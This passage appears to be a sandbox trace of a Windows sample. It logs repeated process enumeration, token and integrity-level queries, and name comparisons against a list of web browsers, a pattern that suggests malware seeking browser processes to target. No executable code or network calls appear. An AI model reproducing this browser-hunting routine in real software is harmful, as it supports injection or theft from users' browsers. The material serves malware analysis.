(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0237.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0237.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0237.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x634) returned 0xb4 [0237.330] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0237.330] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0237.330] GetLastError () returned 0x7a [0237.330] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0237.330] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0237.330] CloseHandle (hObject=0xb8) returned 1 [0237.330] CloseHandle (hObject=0xb4) returned 1 [0237.330] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.330] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0237.330] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0237.330] GetLastError () returned 0x7a [0237.330] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0237.331] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0237.331] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0237.331] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0237.331] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0237.331] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0237.331] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0237.331] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0237.331] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0237.331] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.331] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0239.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x4bfd5c | out: SystemInformation=0x0, ResultLength=0x4bfd5c*=0xbf10) returned 0xc0000004 [0239.343] VirtualAlloc (lpAddress=0x0, dwSize=0xcf10, flAllocationType=0x1000, flProtect=0x4) returned 0x160000 [0239.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0xcf10, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0239.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0239.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0239.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0239.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0239.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0239.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0239.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0239.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0239.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0239.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0239.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0239.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0239.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0239.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0239.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0239.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0239.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0239.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0239.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0239.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0239.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0239.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0xb4 [0239.347] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0239.347] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0239.347] GetLastError () returned 0x7a [0239.347] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0239.347] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0239.347] CloseHandle (hObject=0xb8) returned 1 [0239.347] CloseHandle (hObject=0xb4) returned 1 [0239.348] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.348] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0239.348] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0239.348] GetLastError () returned 0x7a [0239.348] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0239.348] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0239.348] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0239.348] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0239.348] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0239.349] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0239.349] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0239.349] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0239.349] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0239.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xb4 [0239.349] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0239.349] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0239.349] GetLastError () returned 0x7a [0239.349] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0239.349] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0239.349] CloseHandle (hObject=0xb8) returned 1 [0239.350] CloseHandle (hObject=0xb4) returned 1 [0239.350] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.350] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0239.350] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0239.350] GetLastError () returned 0x7a [0239.350] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0239.350] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0239.350] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0239.351] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0239.351] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0239.351] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0239.351] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0239.351] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0239.351] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0239.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0xb4 [0239.351] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0239.351] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0239.351] GetLastError () returned 0x7a [0239.351] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0239.352] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0239.352] CloseHandle (hObject=0xb8) returned 1 [0239.352] CloseHandle (hObject=0xb4) returned 1 [0239.352] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.352] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0239.352] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0239.352] GetLastError () returned 0x7a [0239.352] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0239.353] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0239.353] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0239.353] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0239.353] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0239.353] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0239.353] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0239.353] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0239.353] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0239.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0239.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0239.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0239.353] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0239.354] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0239.354] GetLastError () returned 0x7a [0239.354] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0239.354] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0239.354] CloseHandle (hObject=0xb8) returned 1 [0239.354] CloseHandle (hObject=0xb4) returned 1 [0239.354] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.354] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0239.355] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0239.355] GetLastError () returned 0x7a [0239.355] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0239.355] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0239.355] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0239.355] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0239.355] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0239.355] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0239.355] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0239.355] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0239.355] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0239.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0xb4 [0239.356] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0239.356] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0239.356] GetLastError () returned 0x7a [0239.356] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0239.356] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0239.356] CloseHandle (hObject=0xb8) returned 1 [0239.356] CloseHandle (hObject=0xb4) returned 1 [0239.356] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.357] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0239.357] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0239.357] GetLastError () returned 0x7a [0239.357] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0239.357] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0239.357] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0239.357] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0239.357] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0239.357] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0239.358] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0239.358] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0239.358] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0239.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0xb4 [0239.358] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0239.358] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0239.358] GetLastError () returned 0x7a [0239.358] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0239.358] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0239.358] CloseHandle (hObject=0xb8) returned 1 [0239.359] CloseHandle (hObject=0xb4) returned 1 [0239.359] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.359] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0239.359] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0239.359] GetLastError () returned 0x7a [0239.359] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0239.359] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0239.359] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0239.360] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0239.360] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0239.360] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0239.360] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0239.360] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0239.360] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0239.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xb4 [0239.360] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0239.360] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0239.360] GetLastError () returned 0x7a [0239.360] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0239.361] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0239.361] CloseHandle (hObject=0xb8) returned 1 [0239.361] CloseHandle (hObject=0xb4) returned 1 [0239.361] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.361] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0239.361] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0239.361] GetLastError () returned 0x7a [0239.361] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0239.361] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0239.362] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0239.362] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0239.362] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0239.362] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0239.362] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") 